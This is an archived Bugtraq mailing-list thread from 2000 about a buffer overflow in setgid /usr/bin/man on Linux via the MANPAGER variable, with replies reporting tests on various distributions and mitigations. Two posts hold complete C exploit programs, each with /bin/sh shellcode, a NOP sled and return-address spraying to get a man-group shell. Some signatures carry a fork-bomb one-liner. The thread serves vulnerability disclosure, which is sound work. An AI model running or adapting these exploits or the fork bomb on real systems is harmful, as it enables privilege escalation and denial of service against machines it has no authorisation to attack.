4843260 2000-02-28 11:10 /69 rader/ Postmaster
Mottagare: Bugtraq (import) <9995>
Ärende: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Message-ID: <Pine.LNX.4.21.9402261301190.12075-100000@dione.ids.pl>
Date: Sat, 26 Feb 1994 13:48:35 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id KAA20266
With most of Linux distributions, /usr/bin/man is shipped as setgid
man. This setgid bit is required to build formatted manpages in
/var/catman for faster access. Unfortunately, man does almost
everything via system() calls, where parameters are user-dependent,
and almost always it's sprintf'ed before to fixed size buffers. It's
kinda trivial to gain man privledges, using buffer overflows in
enviromental variables. For example, by specyfing MANPAGER variable
with approx 4k 'A' letters, you'll get SEGV:
$ MANPAGER=`perl -e '{print "A"x4000}'` man ls
[...]
1200 setuid(500) = 0
1200 setgid(15) = 0
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 close(-1) = -1 EBADF (Bad file descriptor)
1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200 --- SIGSEGV (Naruszenie ochrony pamiêci) ---
1200 +++ killed by SIGSEGV +++
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
As you can see, SEGV occours when we're at privledged level (after
setgid man) and is trivially exploitable (generic stack
overflow). What then? We have 'man' privledges and write access to
/var/catman directory tree (less interesting, can be used to mess
around with man output), and, usually, to some /usr/man files (it
shouldn't be possible, but some compilers, like cpp, and programs
like fetchmail, for some reasons have g+w manpages on many
systems). Days ago, Pawel Wilk described possible vulnerability in
manpage processing - execution of arbitrary code when evil manpage is
being browsed... Sample manpage is available at:
ftp://dione.ids.pl/people/siewca/security/man/mkroot.9
So, if you have write access to some manpages, and root uses man,
there's a chance to gain root privledges. If not, only lusers are
affected.
I have no information on other Unices, except for *BSD, where it
seems to be patched days ago, and SunOS, which seems to be
vulnerable, but isn't setuid/setgid (am I right? only one system
tested).
Solution: remove sgid bit from /usr/bin/man (it will be no longer
creating preformatted manpages in /var/catman), or rewrite major
portions of 'man' code.
_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(4843260) ------------------------------------------(Ombruten)
4845380 2000-02-28 19:17 /86 rader/ Postmaster
Mottagare: Bugtraq (import) <10000>
Ärende: man exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000228090917.A7988@freebsd.lublin.pl>
Date: Mon, 28 Feb 2000 09:09:17 +0100
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
/*
* (c) 2000 babcia padlina / b0f
* (lcamtuf's idea)
*
* redhat 6.1 /usr/bin/man exploit
*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char *buf, *p;
int noplen, i, ofs;
long ret, *ap;
if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1)))
{
perror("malloc()");
return -1;
}
if (argc > 1)
ofs = atoi(argv[1]);
else
ofs = OFS;
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
p = buf + noplen + strlen(execshell);
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf));
setenv("MANPAGER", buf, 1);
execl("/usr/bin/man", "man", "ls", 0);
return 0;
}
-- * Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL:
PMF9-RIPE * * Inet: venglin@freebsd.lublin.pl ** PGP:
D48684904685DF43 EA93AFA13BE170BF *
(4845380) ------------------------------------------(Ombruten)
4845610 2000-02-28 20:46 /48 rader/ Postmaster
Mottagare: Bugtraq (import) <10007>
Ärende: Re: man bugs might lead to root compromise (RH 6.1 and othe
------------------------------------------------------------
boxes)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.1000227232847.11234b-100000@down.dbd.com>
Date: Sun, 27 Feb 2000 23:48:09 -0500
Reply-To: Mark Whitis <whitis@DBD.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Mark Whitis <whitis@DBD.COM>
X-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.9402261301190.12075-100000@dione.ids.pl>
On Sat, 26 Feb 1994, Michal Zalewski wrote:
> With most of Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always it's
> sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
> privledges, using buffer overflows in enviromental variables. For example,
> by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:
This might be a side effect of the fix for another security hole.
IIRC, /var/catman/ was world writable allowing for all kinds of
symlink games which would allow ordinary users to do some things as
root (like clobbering files) by laying a trap in /var/catman/ and
waiting for root to run man.
Exploiting this buffer overflow bug to gain man priveledges would then
allow you to exploit the previous bugs as well if root runs "man"
(or possibly the priveledges of any user who runs man).
If you need to run man as root, consider:
su nobody -c "man ls" # assumes shell is /bin/bash
Or just switch to another console or window.
The man program was never designed to be secure but having a shared
manpage cache requires man to be secure. If you disable man page
caching, you should be able to run man without setgid.
---------------------------------------------------------------------------
--- Mark Whitis <whitis@dbd.com> WWW: http://www.dbd.com/~whitis/ ---
---------------------------------------------------------------------------
(4845610) ------------------------------------------(Ombruten)
Läsa nästa text.
4845647 2000-02-28 21:00 /36 rader/ Postmaster
Mottagare: Bugtraq (import) <10008>
Ärende: Re: man bugs might lead to root compromise (RH 6.1 and othe
------------------------------------------------------------
boxes)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0002280901120.2162-100000@dione.ids.pl>
Date: Mon, 28 Feb 2000 09:01:56 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To: H D Moore <hdm@secureaustin.com>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38BA0428.E626D348@secureaustin.com>
On Sun, 27 Feb 2000, H D Moore wrote:
> Hi,
>
> I could not reproduce this on a SuSE 6.2 system running:
>
> man, version 2.3.10, db 2.3.1, July 12th, 1995
> (G.Wilford@ee.surrey.ac.uk)
>
> My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
> in every envrionment variable it uses without it flinching.
Try setting PAGER instead of MANPAGER - older man version used it.
_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(4845647) ------------------------------------------
4845845 2000-02-28 21:54 /68 rader/ Postmaster
Mottagare: Bugtraq (import) <10010>
Ärende: Re: man bugs might lead to root compromise (RH 6.1 and other box
------------------------------------------------------------
s)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-2"
Message-ID: <B354AE82055CD311854A00902779138F1005@sc-data.springfieldclinic.com>
Date: Mon, 28 Feb 2000 09:48:55 -0600
Reply-To: "Licquia, Jeff" <JLicquia@SPRINGFIELDCLINIC.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Licquia, Jeff" <JLicquia@SPRINGFIELDCLINIC.COM>
X-To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id VAA21153
Tested on Debian potato. No SIGSEGV.
Package status for man on my box:
Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
uppercase=bad)
||/ Name Version Description
+++-==============-==============-==========================================
==
ii man-db 2.3.10-69s Display the on-line manual.
-----Original Message-----
From: Michal Zalewski [mailto:lcamtuf@DIONE.IDS.PL]
Sent: Saturday, February 26, 1994 6:49 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: man bugs might lead to root compromise (RH 6.1 and other boxes)
With most of Linux distributions, /usr/bin/man is shipped as setgid
man. This setgid bit is required to build formatted manpages in
/var/catman for faster access. Unfortunately, man does almost
everything via system() calls, where parameters are user-dependent,
and almost always it's sprintf'ed before to fixed size buffers. It's
kinda trivial to gain man privledges, using buffer overflows in
enviromental variables. For example, by specyfing MANPAGER variable
with approx 4k 'A' letters, you'll get SEGV:
$ MANPAGER=`perl -e '{print "A"x4000}'` man ls
[...]
1200 setuid(500) = 0
1200 setgid(15) = 0
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file
or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No
such file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1
ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No
such file or directory)1200 close(-1) = -1 EBADF
(Bad file descriptor)
1200 write(2, "Error executing formatting or display command.\nSystem
command (cd /usr/man ; (echo
1200 --- SIGSEGV (Naruszenie ochrony pamiêci) ---
1200 +++ killed by SIGSEGV +++
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
[...]
(4845845) ------------------------------------------(Ombruten)
4845915 2000-02-28 22:17 /44 rader/ Postmaster
Mottagare: Bugtraq (import) <10012>
Ärende: Re: man bugs might lead to root compromise (RH 6.1 and othe
------------------------------------------------------------
boxes)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <38BA61F2.60052785@secureaustin.com>
Date: Mon, 28 Feb 2000 05:54:26 -0600
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To: Michal Zalewski <lcamtuf@dione.ids.pl>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
I tried PAGERas well as every other environment variable I could tell
it read, no luck. The PAGER just gives me "AAAAAAAAA" ... "AA:
Command not found."
-HD
Michal Zalewski wrote:
>
> On Sun, 27 Feb 2000, H D Moore wrote:
>
> > Hi,
> >
> > I could not reproduce this on a SuSE 6.2 system running:
> >
> > man, version 2.3.10, db 2.3.1, July 12th, 1995
> > (G.Wilford@ee.surrey.ac.uk)
> >
> > My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
> > in every envrionment variable it uses without it flinching.
>
> Try setting PAGER instead of MANPAGER - older man version used it.
>
> _______________________________________________________
> Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
> [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
> [+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
> =-----=> God is real, unless declared integer. <=-----=
(4845915) ------------------------------------------(Ombruten)
4846058 2000-02-28 22:51 /81 rader/ Postmaster
Mottagare: Bugtraq (import) <10013>
Ärende: linux SGID-man exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.10.10002280617450.25519-100000@sdf.lonestar.org>
Date: Mon, 28 Feb 2000 06:23:06 -0600
Reply-To: mario paskual <buterfre@SDF.LONESTAR.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: mario paskual <buterfre@SDF.LONESTAR.ORG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
/*
***************************************************
*** agroMANauer.c ***
*** linux SGID-man exploit ***
*** by buterfree@lettera.net 2000 ***
*** tested on RedHat 5.1 ***
*** It gives an egid-man shell ***
*** ***
*** Dedicado a Juan, Jor y la gente del chamizu ***
*** (Ehhh tio, la guerra acaba de Empezar) ***
***************************************************
*/
#include <stdio.h>
#define BUF_SIZE 5000
#define POS_RET 3500
#define RETADDR 0xbfffefef
// shellcode
char shellcode[] = // 48 caracteres
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh";
void main (int argc, char *argv[]) {
int i;
FILE *f;
char buf[BUF_SIZE];
long retaddr, offset;
printf ("\n");
printf ("****************************************\n");
printf ("* agroMANauer (linux SGID-man exploit) *\n");
printf ("* by buterfree@lettera.net 2000 * \n");
printf ("**************************************** \n\n");
printf ("Try offsets -3000,0,3000,...\n");
printf ("Use : %s [offset] \n", argv[0]);
offset = 0;
if (argc>1) {
offset = atol (argv[1]);
}
retaddr = RETADDR + offset;
printf ("Return Address = 0x%x \n",retaddr);
// Fill buffer with NOP's
memset (buf, 0x90, BUF_SIZE);
buf[BUF_SIZE]=0;
// Copy Return Address
for (i=POS_RET; i<=BUF_SIZE-10; i+=4) {
*(long*)(buf+i) = (long) retaddr;
}
// Copy shellCode
for (i=0; i<strlen(shellcode); i++) {
buf[i+POS_RET-strlen(shellcode)-20] = shellcode[i];
}
// Export TERMCAP
setenv ("MANPAGER", buf, 1);
// Run program
execl ("/usr/bin/man","man","ls",NULL);
}
(4846058) ------------------------------------------
Läsa nästa text.
4846522 2000-02-29 00:46 /56 rader/ Postmaster
Mottagare: Bugtraq (import) <10014>
Ärende: Re: man bugs might lead to root compromise (RH 6.1 and othe
------------------------------------------------------------
boxes)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Message-ID: <38BA0428.E626D348@secureaustin.com>
Date: Sun, 27 Feb 2000 23:14:16 -0600
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id AAA27680
Hi,
I could not reproduce this on a SuSE 6.2 system running:
man, version 2.3.10, db 2.3.1, July 12th, 1995
(G.Wilford@ee.surrey.ac.uk)
My copy is setgid man and I also subjected it to 4,8, and 20 kb
buffers in every envrionment variable it uses without it flinching.
Michal Zalewski wrote:
>
> With most of Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always it's
> sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
> privledges, using buffer overflows in enviromental variables. For example,
> by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:
>
> $ MANPAGER=`perl -e '{print "A"x4000}'` man ls
>
> [...]
>
> 1200 setuid(500) = 0
> 1200 setgid(15) = 0
> 1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 close(-1) = -1 EBADF (Bad file descriptor)
> 1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
> 1200 --- SIGSEGV (Naruszenie ochrony pamiêci) ---
> 1200 +++ killed by SIGSEGV +++
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
(4846522) ------------------------------------------(Ombruten)
4853647 2000-03-01 21:11 /178 rader/ Postmaster
Mottagare: Bugtraq (import) <10049>
Ärende: Re: man bugs might lead to root compromise (RH 6.1 and othe
------------------------------------------------------------
boxes)
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000301115937.R4498@securityfocus.com>
Date: Wed, 1 Mar 2000 11:59:37 -0800
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Summary of comments on ths thread:
"Dehner, Ben" <Btd@valmont.com>:
HPUX 10.20 also does not have suid/sgid /usr/bin/man, so I would
guess is not exploitable.
Thomas Molina <tmolina@home.com>:
babcia padlina exploit did not work under RedHat 6.1
Przemyslaw Frasunek <venglin@own3d.freebsd.lublin.pl>:
so try other offsets. -1000 should work on most redhat 6.1/6.0/5.2
boxes.
Stefan Schneider <stefan.schneider@comsat.com.ve>:
No problems here...
Tested on SuSE 6.3, no SIGSEV either.... The box is a regular SuSE
6.3 install (No patches, fresh install from the CD's) and the package
status is man-db ver 2.3.10-69d69i.
krasel@wpxx02.toxi.uni-wuerzburg.de (Cornelius Krasel):
SuSE man (at least on SuSE 6.3 which is the same version) uses PAGER
instead of MANPAGER and blissfully crashes when subjected to 4000 'A'
letters in this variable.
I didn't manage to get the redhat exploit to work properly, but I got
several times "sh: =FC=FF=BF: command not found" which indicates to
me that a more skillful programmer than me would be able to get it to
work.
Phil Stracchino <alaric@babcom.com>:
Slackware 7.0 does not appear to be vulnerable. /usr/bin/man is not
setgid in slackware, so although it does indeed SEGV at the expected
location, no privileges are gained.
"Licquia, Jeff" <JLicquia@SpringfieldClinic.com>:
On my aforementioned Debian system, this fails with:
sh: AAAA...AAAA: command not found
man: command exited with status 32512: /bin/gzip -dc
'/var/cache/man/cat1/ls.1.gz' | { export MAN_PN LESS; MAN_PN='ls(1)';
LESS="$LESS\$-Pm\:\$ix8mPm Manual page $MAN_PN ?ltline %lt?L/%L.:byte
%bB?s/%s..?e (END):?pB %pB\\%.."; AAAA....AAAA; }
(AAA's truncated for readability)
Greg Olszewski <noop@nwonknu.org>:
This does not create a sigsegv on Debian GNU/Linux slink, potato, or
woody. With man -V of: slink: man, version 2.3.10, db 2.3.1, July
12th, 1995 (G.Wilford@ee.surrey.ac.uk) debian version 2.3.10-69FIX.1,
(Jun 9 1999), Fabrizio Polacco
+<fpolacco@debian.org>
potato & woody: man, version 2.3.12, Wed Feb 23 00:00:00 EET 2000
(fpolacco@debian.org)
It was tried setting both MANPAGER and PAGER. In each case, 4000 and
20000 were tried, and sh:<a lot of A's> command not found was echoed
to stderr.
The lack of a sgid bit on /usr/bin/man is the default configuration
for both potato and woody.
Scott Lamb <slamb@oh.yeah.org>:
On my RedHat 6.1 system, this does NOT appear to be exploitable. The
reason is: the execution of arbitrary commands is done while
processing the troff macros: while generating the catman pages from
the man pages. Merely viewing the preformatted pages does not allow
commands to be executed.
So it is not exploitable without access to the man (*.[1-9])
pages. On RedHat 6.1, these are owned by root. Exploiting the buffer
overflow in man gives you a chance to be annoying and send nasty
messages to people when they run man, but not gain root priveleges.
Bob Billson <bob@goleader.com>:
Same here on two different Linux boxen, running Debian (Slink and
Potato).
H D Moore <hdm@secureaustin.com>:
I tested this on a stock RedHat 6.1 box and it wouldnt segfault
unless at least 4534 characters were in the buffer. With some
twiddling on the command line I got it to jump to arbitrary addresses
with:
$ MANPATH=`perl -e 'print "A" x 4534 . "BBBB"'`
^-- this makes jump to 0x42424242
Anyways, anyone feel like writing an exploit?
Julian Squires <tek@wiw.org>:
I could equally not reproduce this on several Debian machines,
running:
man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilford@ee.surrey.ac.uk)
debian version 2.3.10-69s, (Oct 28 1999), Fabrizio Polacco <fpolacco@debian.org>
as well as:
man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilford@ee.surrey.ac.uk)
debian version 2.3.10-71, (Feb 11 2000), Fabrizio Polacco <fpolacco@debian.org>
/usr/bin/man is setuid man under debian, and I attempt with both
PAGER and MANPAGER variables, with strings up to 65536 bytes in
length.
What version of man is vulnerable to this?
Marcin Owsiany <porridge@pandora.info.bielsko.pl>:
Tested on Debian potato
ii man-db 2.3.12 Display the on-line manual.
and slink (2.1)
ii man-db 2.3.10-69FIX.1 Display the on-line manual.
both PAGER and MANPAGER set to a length from 400 to 40000 Bytes.
No SIGSEGV
Dylan Griffiths <Dylan_G@bigfoot.com>:
Slackware Linux 7.0 is not setgid man, and the /var/man/cat
directories are owned root.root, but have the same sticky bit as the
/tmp directory. So Slackware is likely secure from any man exploits.
Kris Kennaway <kris@hub.freebsd.org>
FreeBSD uses the GNU man code, but it seems we fixed this (along with
a bunch of other overflows) back in '96..
From: Luca Berra <bluca@comedia.it>:
this is man_db a different program than standard linux man.
past versions had bugs of their own, check bugtraq archives
Thomas Bader <thomasb@trash.net>:
I could not reproduce this too. I'm using Debian GNU/Linux 2.1 .
"man --version" says:
| man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilford@ee.surrey.ac.uk)
| debian version 2.3.10-68, (Oct 6 1998), Fabrizio Polacco <fpolacco@debian.org>
And "ls -l /usr/bin/man" says:
|-rwsr-xr-x 1 man root 119864 Oct 6 1998 /usr/bin/man
I tried the enviroments PAGER and MANPAGER, but they both didn't work.
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
(4853647) ------------------------------------------(Ombruten)